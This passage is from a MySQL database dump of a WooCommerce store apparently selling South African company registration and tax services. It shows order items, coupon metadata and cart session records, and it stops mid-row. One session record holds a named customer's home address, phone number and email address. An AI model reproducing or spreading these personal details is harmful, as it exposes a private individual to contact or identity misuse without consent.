Registration\";s:11:\"usage_count\";i:9;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:2:{i:0;i:64;i:1;i:28;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:0;s:20:\"usage_limit_per_user\";i:0;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:1;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(2035,250,'_product_id','28'),(2036,250,'_variation_id','0'),(2037,250,'_qty','1'),(2038,250,'_tax_class',''),(2039,250,'_line_subtotal','750'),(2040,250,'_line_subtotal_tax','0'),(2041,250,'_line_total','199'),(2042,250,'_line_tax','0'),(2043,250,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2044,251,'_product_id','31327'),(2045,251,'_variation_id','0'),(2046,251,'_qty','1'),(2047,251,'_tax_class',''),(2048,251,'_line_subtotal','75'),(2049,251,'_line_subtotal_tax','0'),(2050,251,'_line_total','75'),(2051,251,'_line_tax','0'),(2052,251,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2053,252,'discount_amount','551'),(2054,252,'discount_amount_tax','0'),(2055,252,'coupon_data','a:24:{s:2:\"id\";i:29812;s:4:\"code\";s:9:\"regmeless\";s:6:\"amount\";s:3:\"551\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:54:56.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-07-18 14:39:17.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";N;s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:42:\"Private company Owner Managed Registration\";s:11:\"usage_count\";i:9;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:2:{i:0;i:64;i:1;i:28;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:0;s:20:\"usage_limit_per_user\";i:0;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:1;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(2071,254,'_line_total','2250'),(2070,254,'_line_subtotal_tax','0'),(2069,254,'_line_subtotal','2250'),(2068,254,'_tax_class',''),(2067,254,'_qty','1'),(2065,254,'_product_id','64'),(2066,254,'_variation_id','0'),(2072,254,'_line_tax','0'),(2073,254,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2074,255,'_product_id','80'),(2075,255,'_variation_id','0'),(2076,255,'_qty','1'),(2077,255,'_tax_class',''),(2078,255,'_line_subtotal','199'),(2079,255,'_line_subtotal_tax','0'),(2080,255,'_line_total','10'),(2081,255,'_line_tax','0'),(2082,255,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2083,256,'discount_amount','189'),(2084,256,'discount_amount_tax','0'),(2085,256,'coupon_data','a:24:{s:2:\"id\";i:32427;s:4:\"code\";s:6:\"imodis\";s:6:\"amount\";s:3:\"189\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-08-08 13:23:46.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-08-08 13:23:46.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";N;s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:17:\"Discount test 189\";s:11:\"usage_count\";i:0;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:1:{i:0;i:80;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:0;s:20:\"usage_limit_per_user\";i:0;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:0;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(2086,257,'_product_id','28'),(2087,257,'_variation_id','0'),(2088,257,'_qty','1'),(2089,257,'_tax_class',''),(2090,257,'_line_subtotal','1250'),(2091,257,'_line_subtotal_tax','0'),(2092,257,'_line_total','399'),(2093,257,'_line_tax','0'),(2094,257,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2095,258,'_product_id','29583'),(2096,258,'_variation_id','0'),(2097,258,'_qty','1'),(2098,258,'_tax_class',''),(2099,258,'_line_subtotal','792'),(2100,258,'_line_subtotal_tax','0'),(2101,258,'_line_total','792'),(2102,258,'_line_tax','0'),(2103,258,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2104,259,'discount_amount','851'),(2105,259,'discount_amount_tax','0'),(2106,259,'coupon_data','a:24:{s:2:\"id\";i:29812;s:4:\"code\";s:9:\"regmeless\";s:6:\"amount\";s:3:\"851\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:54:56.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-08-24 12:18:26.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";N;s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:42:\"Private company Owner Managed Registration\";s:11:\"usage_count\";i:9;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:2:{i:0;i:64;i:1;i:28;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:0;s:20:\"usage_limit_per_user\";i:0;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:1;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(2107,260,'_product_id','28'),(2108,260,'_variation_id','0'),(2109,260,'_qty','1'),(2110,260,'_tax_class',''),(2111,260,'_line_subtotal','1250'),(2112,260,'_line_subtotal_tax','0'),(2113,260,'_line_total','399'),(2114,260,'_line_tax','0'),(2115,260,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2116,261,'discount_amount','851'),(2117,261,'discount_amount_tax','0'),(2118,261,'coupon_data','a:24:{s:2:\"id\";i:29812;s:4:\"code\";s:9:\"regmeless\";s:6:\"amount\";s:3:\"851\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:54:56.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-08-24 12:18:26.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";N;s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:42:\"Private company Owner Managed Registration\";s:11:\"usage_count\";i:9;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:2:{i:0;i:64;i:1;i:28;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:0;s:20:\"usage_limit_per_user\";i:0;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:1;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}'),(2119,262,'_product_id','28'),(2120,262,'_variation_id','0'),(2121,262,'_qty','1'),(2122,262,'_tax_class',''),(2123,262,'_line_subtotal','1250'),(2124,262,'_line_subtotal_tax','0'),(2125,262,'_line_total','399'),(2126,262,'_line_tax','0'),(2127,262,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(2128,263,'discount_amount','851'),(2129,263,'discount_amount_tax','0'),(2130,263,'coupon_data','a:24:{s:2:\"id\";i:29812;s:4:\"code\";s:9:\"regmeless\";s:6:\"amount\";s:3:\"851\";s:12:\"date_created\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-06-04 13:54:56.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:13:\"date_modified\";O:11:\"WC_DateTime\":4:{s:13:\"\0*\0utc_offset\";i:7200;s:4:\"date\";s:26:\"2019-08-24 12:18:26.000000\";s:13:\"timezone_type\";i:1;s:8:\"timezone\";s:6:\"+00:00\";}s:12:\"date_expires\";N;s:13:\"discount_type\";s:13:\"fixed_product\";s:11:\"description\";s:42:\"Private company Owner Managed Registration\";s:11:\"usage_count\";i:9;s:14:\"individual_use\";b:0;s:11:\"product_ids\";a:2:{i:0;i:64;i:1;i:28;}s:20:\"excluded_product_ids\";a:0:{}s:11:\"usage_limit\";i:0;s:20:\"usage_limit_per_user\";i:0;s:22:\"limit_usage_to_x_items\";N;s:13:\"free_shipping\";b:0;s:18:\"product_categories\";a:0:{}s:27:\"excluded_product_categories\";a:0:{}s:18:\"exclude_sale_items\";b:1;s:14:\"minimum_amount\";s:0:\"\";s:14:\"maximum_amount\";s:0:\"\";s:18:\"email_restrictions\";a:0:{}s:7:\"virtual\";b:0;s:9:\"meta_data\";a:0:{}}');
/*!40000 ALTER TABLE `wpxb_woocommerce_order_itemmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_woocommerce_order_items`
--

DROP TABLE IF EXISTS `wpxb_woocommerce_order_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_woocommerce_order_items` (
  `order_item_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `order_item_name` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `order_item_type` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `order_id` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`order_item_id`),
  KEY `order_id` (`order_id`)
) ENGINE=MyISAM AUTO_INCREMENT=264 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_woocommerce_order_items`
--

LOCK TABLES `wpxb_woocommerce_order_items` WRITE;
/*!40000 ALTER TABLE `wpxb_woocommerce_order_items` DISABLE KEYS */;
INSERT INTO `wpxb_woocommerce_order_items` VALUES (1,'Private Company Registration Standard MOI - Basic','line_item',273),(2,'Import and Export Code Registration','line_item',277),(3,'Change In Directors','line_item',277),(4,'Change in CC Member/s','line_item',278),(5,'Personal Liability Company','line_item',280),(6,'Tax Clearance Certificate','line_item',281),(7,'BEE Affidavit','line_item',282),(8,'Change In Directors','line_item',282),(9,'Private Company Registration Standard MOI - Basic','line_item',283),(10,'Change in Company Address','line_item',284),(11,'Company Register','line_item',286),(12,'Private Company Registration Standard MOI - Basic','line_item',315),(13,'Private Company Registration Standard MOI - Full','line_item',317),(14,'Private Company Registration Standard MOI - Basic','line_item',318),(15,'Private Company Registration Standard MOI - Full','line_item',333),(16,'BEE Affidavit','line_item',353),(17,'bee','coupon',353),(18,'Private Company Registration Standard MOI - Basic','line_item',354),(19,'zai','coupon',354),(20,'<center>Private Company Registration- Basic</center>','line_item',27891),(21,'<center>Private Company Registration- Basic</center>','line_item',27892),(23,'<center>Private Company Registration- Basic</center>','line_item',27894),(24,'<center>Annual Returns</center>','line_item',27915),(25,'<center>Change In Director/s</center>','line_item',27916),(26,'<center>What I need to know before I start my business in SA</center>','line_item',27916),(27,'<center>Private Company Registration- Basic</center>','line_item',27923),(28,'<center>Urgent VAT Registration</center>','line_item',27923),(29,'<center>Salary Tax Registration (PAYE)</center>','line_item',27933),(30,'<center>Salary Tax Registration (PAYE)</center>','line_item',27934),(31,'<center>Private Company Registration- Basic</center>','line_item',27935),(32,'<center>Annual Returns</center>','line_item',27935),(33,'Personal Liability Company','line_item',27936),(34,'Private Company Registration- Basic','line_item',27937),(35,'Private Company Registration- Basic','line_item',27938),(36,'Private Company Registration- Basic','line_item',27939),(37,'Private Company Registration- Basic','line_item',27940),(38,'50% off crc','coupon',27940),(39,'Private Company Registration- Standard','line_item',28042),(40,'Import and Export Code Registration','line_item',28042),(41,'Private Company Registration- Standard','line_item',28070),(42,'Private Company Registration - Full','line_item',28076),(43,'Tax Clearance Certificate','line_item',28077),(44,'Urgent VAT Registration','line_item',28078),(45,'Salary Tax Registration (PAYE)','line_item',28079),(46,'Tax Clearance Certificate','line_item',28079),(47,'Business Income Tax Registration','line_item',28079),(48,'Import and Export Code Registration','line_item',28080),(49,'VAT Registration','line_item',28080),(50,'Annual Returns','line_item',28080),(51,'Company and Close Corporations Restorations','line_item',28080),(52,'Change in Company Address','line_item',28080),(53,'BEE Affidavit','line_item',28080),(54,'Change in CC Member/s','line_item',28080),(55,'What I need to know before I start my business in SA','line_item',28085),(56,'Private Company Registration- Standard','line_item',28498),(57,'Annual Returns','line_item',28499),(58,'Gold Bundle','line_item',28499),(59,'Change in Close Corporation Address','line_item',28499),(60,'Private Company Registration - Full','line_item',28500),(61,'Private Company with 1 Director','line_item',28577),(62,'Private Company - Multiple Shareholders','line_item',28778),(63,'Business Pro','line_item',28823),(64,'Basic Bundle','line_item',28824),(65,'Private Company - Owner Managed','line_item',28825),(66,'Import and Export Code Registration','line_item',28826),(67,'Salary Tax Registration (PAYE)','line_item',28827),(68,'Salary Tax Registration (PAYE)','line_item',28870),(69,'Private Company - Owner Managed','line_item',28870),(70,'Private Company - Owner Managed','line_item',28871),(71,'Private Company - Owner Managed','line_item',28872),(72,'Private Company customised MOI with executive and non-executive directors','line_item',28873),(73,'Private Company customised MOI with executive and non-executive directors','line_item',28874),(74,'Private Company customised MOI with executive and non-executive directors','line_item',28877),(75,'Private Company customised MOI with executive and non-executive directors','line_item',28878),(76,'Private Company - Multiple Shareholders','line_item',28879),(77,'Private Company - Multiple Shareholders','line_item',28880),(78,'Private Company - Owner Managed','line_item',28881),(79,'Gold Bundle','line_item',28882),(80,'Business Pro','line_item',28883),(81,'Private Company - Owner Managed','line_item',28884),(82,'Tender Ready','line_item',28885),(83,'Basic Bundle','line_item',28886),(84,'Annual Returns','line_item',28887),(85,'Company and Close Corporations Restorations','line_item',28888),(86,'Business Income Tax Registration','line_item',28889),(87,'Urgent VAT Registration','line_item',28890),(88,'Change in Close Corporation Address','line_item',28891),(89,'Change in Company Address','line_item',28892),(90,'Change in CC Member/s','line_item',28893),(91,'Change In Director/s','line_item',28894),(92,'BEE Affidavit','line_item',28895),(93,'What I need to know before I start my business in SA','line_item',28896),(94,'Private Company customised MOI with executive and non-executive directors','line_item',28897),(95,'Private Company - Multiple Shareholders','line_item',28898),(96,'Import and Export Code Registration','line_item',28899),(97,'VAT Registration','line_item',28900),(98,'Tax Clearance Certificate','line_item',28901),(99,'Salary Tax Registration (PAYE)','line_item',28902),(100,'Personal Liability Company','line_item',28903),(101,'Private Company - Owner Managed','line_item',28904),(102,'Private Company - Multiple Shareholders','line_item',28998),(103,'Private Company - Multiple Shareholders','line_item',29004),(104,'Salary Tax Registration (PAYE)','line_item',29004),(105,'customise','coupon',29004),(106,'Annual Returns','line_item',29005),(107,'Change in CC Member/s','line_item',29005),(108,'Tender Ready','line_item',29024),(109,'Private Company - Owner Managed','line_item',29024),(110,'Private Company - Multiple Shareholders','line_item',29025),(111,'Personal Liability Company','line_item',29026),(112,'Private Company customised MOI - with executive and non-executive directors','line_item',29027),(113,'Urgent VAT Registration','line_item',29028),(114,'Salary Tax Registration (PAYE)','line_item',29029),(115,'Tax Clearance Certificate','line_item',29030),(116,'Business Income Tax Registration','line_item',29031),(117,'Import and Export Code Registration','line_item',29032),(118,'VAT Registration','line_item',29033),(119,'Annual Returns','line_item',29034),(120,'Change In Director/s','line_item',29035),(121,'Change in CC Member/s','line_item',29036),(122,'Change in Close Corporation Address','line_item',29037),(123,'Change in Company Address','line_item',29038),(124,'Company and Close Corporations Restorations','line_item',29039),(125,'BEE Affidavit','line_item',29040),(126,'What I need to know before I start my business in SA','line_item',29041),(127,'Basic Bundle','line_item',29042),(128,'Gold Bundle','line_item',29043),(129,'Tender Ready','line_item',29044),(130,'Business Pro','line_item',29045),(131,'BEE Affidavit','line_item',29046),(132,'Private Company - Multiple Shareholders','line_item',29064),(133,'Annual Returns','line_item',29104),(134,'Annual Returns','line_item',29106),(135,'Private Company - Multiple Shareholders','line_item',29106),(136,'BEE Affidavit','line_item',29107),(137,'What I need to know before I start my business in SA','line_item',29108),(138,'BEE Affidavit','line_item',29198),(139,'BEE Affidavit','line_item',29199),(140,'wajoodeen51544','coupon',29199),(148,'Private Company -  Multiple Shareholders','line_item',29515),(150,'Private Company - Owner Managed','line_item',29527),(191,'Private Company - Owner Managed','line_item',29958),(192,'Zoho Books Cloud Accounting Annual','line_item',29958),(193,'Private Company - Owner Managed','line_item',29963),(194,'Zoho Books Cloud Accounting Annual','line_item',29963),(195,'regmeless','coupon',29963),(196,'countmeless','coupon',29963),(206,'Zoho Books Cloud Accounting Monthly','line_item',29981),(207,'Zoho Books Cloud Accounting Annual','line_item',29981),(208,'countmeless','coupon',29981),(213,'Zoho Books Cloud Accounting Annual','line_item',30007),(214,'countmeless','coupon',30007),(215,'Zoho Books Cloud Accounting Annual','line_item',30018),(216,'Private Company - Owner Managed','line_item',30018),(217,'countmeless','coupon',30018),(218,'Private Company - Owner Managed','line_item',30025),(219,'Zoho Books Cloud Accounting Annual','line_item',30065),(220,'Zoho Books Cloud Accounting Annual','line_item',30179),(221,'Private Company - Owner Managed','line_item',30179),(222,'regmeless','coupon',30179),(223,'countmeless','coupon',30179),(224,'Private Company - Owner Managed','line_item',30197),(225,'regmeless','coupon',30197),(226,'Annual Returns','line_item',31201),(227,'Annual Returns','line_item',31229),(228,'Annual Returns','line_item',31234),(229,'Private Company - Owner Managed','line_item',32034),(230,'regmeless','coupon',32034),(231,'Private Company - Owner Managed','line_item',32071),(232,'regmeless','coupon',32071),(233,'Private Company - Owner Managed','line_item',32103),(234,'Private Company - Owner Managed','line_item',32108),(235,'regmeless','coupon',32108),(236,'Private Company - Owner Managed','line_item',32115),(237,'regmeless','coupon',32115),(238,'Private Company - Owner Managed','line_item',32119),(239,'Private Company customised MOI','line_item',32128),(240,'Personal Liability Company','line_item',32137),(241,'Company Register','line_item',32142),(242,'Private Company - Owner Managed','line_item',32248),(243,'regmeless','coupon',32248),(244,'Private Company - Owner Managed','line_item',32262),(245,'Company Register','line_item',32262),(246,'regmeless','coupon',32262),(247,'Private Company - Owner Managed','line_item',32268),(248,'Company Register','line_item',32268),(249,'regmeless','coupon',32268),(250,'Private Company - Owner Managed','line_item',32274),(251,'Company Register','line_item',32274),(252,'regmeless','coupon',32274),(254,'Personal Liability Company','line_item',32348),(255,'What I need to know before I start my business in SA','line_item',32432),(256,'imodis','coupon',32432),(257,'Private Company - Owner Managed','line_item',33225),(258,'Zoho Books Cloud Accounting Annual','line_item',33225),(259,'regmeless','coupon',33225),(260,'Private Company - Owner Managed','line_item',33230),(261,'regmeless','coupon',33230),(262,'Private Company - Owner Managed','line_item',33236),(263,'regmeless','coupon',33236);
/*!40000 ALTER TABLE `wpxb_woocommerce_order_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_woocommerce_payment_tokenmeta`
--

DROP TABLE IF EXISTS `wpxb_woocommerce_payment_tokenmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_woocommerce_payment_tokenmeta` (
  `meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `payment_token_id` bigint(20) unsigned NOT NULL,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  PRIMARY KEY (`meta_id`),
  KEY `payment_token_id` (`payment_token_id`),
  KEY `meta_key` (`meta_key`(250))
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_woocommerce_payment_tokenmeta`
--

LOCK TABLES `wpxb_woocommerce_payment_tokenmeta` WRITE;
/*!40000 ALTER TABLE `wpxb_woocommerce_payment_tokenmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_woocommerce_payment_tokenmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_woocommerce_payment_tokens`
--

DROP TABLE IF EXISTS `wpxb_woocommerce_payment_tokens`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_woocommerce_payment_tokens` (
  `token_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `gateway_id` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `token` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
  `type` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `is_default` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`token_id`),
  KEY `user_id` (`user_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_woocommerce_payment_tokens`
--

LOCK TABLES `wpxb_woocommerce_payment_tokens` WRITE;
/*!40000 ALTER TABLE `wpxb_woocommerce_payment_tokens` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_woocommerce_payment_tokens` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_woocommerce_sessions`
--

DROP TABLE IF EXISTS `wpxb_woocommerce_sessions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_woocommerce_sessions` (
  `session_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `session_key` char(32) COLLATE utf8mb4_unicode_ci NOT NULL,
  `session_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `session_expiry` bigint(20) unsigned NOT NULL,
  PRIMARY KEY (`session_id`),
  UNIQUE KEY `session_key` (`session_key`)
) ENGINE=MyISAM AUTO_INCREMENT=5138 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_woocommerce_sessions`
--

LOCK TABLES `wpxb_woocommerce_sessions` WRITE;
/*!40000 ALTER TABLE `wpxb_woocommerce_sessions` DISABLE KEYS */;
INSERT INTO `wpxb_woocommerce_sessions` VALUES (5133,'1','a:10:{s:4:\"cart\";s:413:\"a:1:{s:32:\"33e75ff09dd601bbe69f351039152189\";a:11:{s:3:\"key\";s:32:\"33e75ff09dd601bbe69f351039152189\";s:10:\"product_id\";i:28;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b5c1d5ca8bae6d4896cf1807cdf763f0\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:1250;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:399;s:8:\"line_tax\";i:0;}}\";s:11:\"cart_totals\";s:411:\"a:15:{s:8:\"subtotal\";s:7:\"1250.00\";s:12:\"subtotal_tax\";d:0;s:14:\"shipping_total\";s:4:\"0.00\";s:12:\"shipping_tax\";d:0;s:14:\"shipping_taxes\";a:0:{}s:14:\"discount_total\";d:851;s:12:\"discount_tax\";d:0;s:19:\"cart_contents_total\";s:6:\"399.00\";s:17:\"cart_contents_tax\";d:0;s:19:\"cart_contents_taxes\";a:0:{}s:9:\"fee_total\";s:4:\"0.00\";s:7:\"fee_tax\";d:0;s:9:\"fee_taxes\";a:0:{}s:5:\"total\";s:6:\"399.00\";s:9:\"total_tax\";d:0;}\";s:15:\"applied_coupons\";s:26:\"a:1:{i:0;s:9:\"regmeless\";}\";s:22:\"coupon_discount_totals\";s:28:\"a:1:{s:9:\"regmeless\";d:851;}\";s:26:\"coupon_discount_tax_totals\";s:6:\"a:0:{}\";s:21:\"removed_cart_contents\";s:6:\"a:0:{}\";s:8:\"customer\";s:836:\"a:26:{s:2:\"id\";s:1:\"1\";s:13:\"date_modified\";s:25:\"2019-08-24T13:31:07+00:00\";s:8:\"postcode\";s:4:\"1827\";s:4:\"city\";s:12:\"Johannesburg\";s:9:\"address_1\";s:21:\"103 Agapanthus avenue\";s:7:\"address\";s:21:\"103 Agapanthus avenue\";s:9:\"address_2\";s:7:\"Lenasia\";s:5:\"state\";s:2:\"GP\";s:7:\"country\";s:2:\"ZA\";s:17:\"shipping_postcode\";s:0:\"\";s:13:\"shipping_city\";s:0:\"\";s:18:\"shipping_address_1\";s:0:\"\";s:16:\"shipping_address\";s:0:\"\";s:18:\"shipping_address_2\";s:0:\"\";s:14:\"shipping_state\";s:2:\"GP\";s:16:\"shipping_country\";s:2:\"ZA\";s:13:\"is_vat_exempt\";s:0:\"\";s:19:\"calculated_shipping\";s:1:\"1\";s:10:\"first_name\";s:6:\"Imraan\";s:9:\"last_name\";s:9:\"Wajoodeen\";s:7:\"company\";s:4:\"Test\";s:5:\"phone\";s:10:\"0878025219\";s:5:\"email\";s:19:\"imraanmaw@gmail.com\";s:19:\"shipping_first_name\";s:0:\"\";s:18:\"shipping_last_name\";s:0:\"\";s:16:\"shipping_company\";s:0:\"\";}\";s:10:\"wc_notices\";N;s:21:\"chosen_payment_method\";s:7:\"payfast\";s:22:\"order_awaiting_payment\";N;}',1566997919),(5136,'5cc08ca8e92a185247b5c891ffdee0c1','a:9:{s:4:\"cart\";s:413:\"a:1:{s:32:\"33e75ff09dd601bbe69f351039152189\";a:11:{s:3:\"key\";s:32:\"33e75ff09dd601bbe69f351039152189\";s:10:\"product_id\";i:28;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b5c1d5ca8bae6d4896cf1807cdf763f0\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:1250;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:399;s:8:\"line_tax\";i:0;}}\";s:11:\"cart_totals\";s:411:\"a:15:{s:8:\"subtotal\";s:7:\"1250.00\";s:12:\"subtotal_tax\";d:0;s:14:\"shipping_total\";s:4:\"0.00\";s:12:\"shipping_tax\";d:0;s:14:\"shipping_taxes\";a:0:{}s:14:\"discount_total\";d:851;s:12:\"discount_tax\";d:0;s:19:\"cart_contents_total\";s:6:\"399.00\";s:17:\"cart_contents_tax\";d:0;s:19:\"cart_contents_taxes\";a:0:{}s:9:\"fee_total\";s:4:\"0.00\";s:7:\"fee_tax\";d:0;s:9:\"fee_taxes\";a:0:{}s:5:\"total\";s:6:\"399.00\";s:9:\"total_tax\";d:0;}\";s:15:\"applied_coupons\";s:26:\"a:1:{i:0;s:9:\"regmeless\";}\";s:22:\"coupon_discount_totals\";s:28:\"a:1:{s:9:\"regmeless\";d:851;}\";s:26:\"coupon_discount_tax_totals\";s:6:\"a:0:{}\";s:21:\"removed_cart_contents\";s:6:\"a:0:{}\";s:10:\"wc_notices\";N;s:8:\"customer\";s:688:\"a:26:{s:2:\"id\";s:1:\"0\";s:13:\"date_modified\";s:0:\"\";s:8:\"postcode\";s:0:\"\";s:4:\"city\";s:0:\"\";s:9:\"address_1\";s:0:\"\";s:7:\"address\";s:0:\"\";s:9:\"address_2\";s:0:\"\";s:5:\"state\";s:0:\"\";s:7:\"country\";s:2:\"ZA\";s:17:\"shipping_postcode\";s:0:\"\";s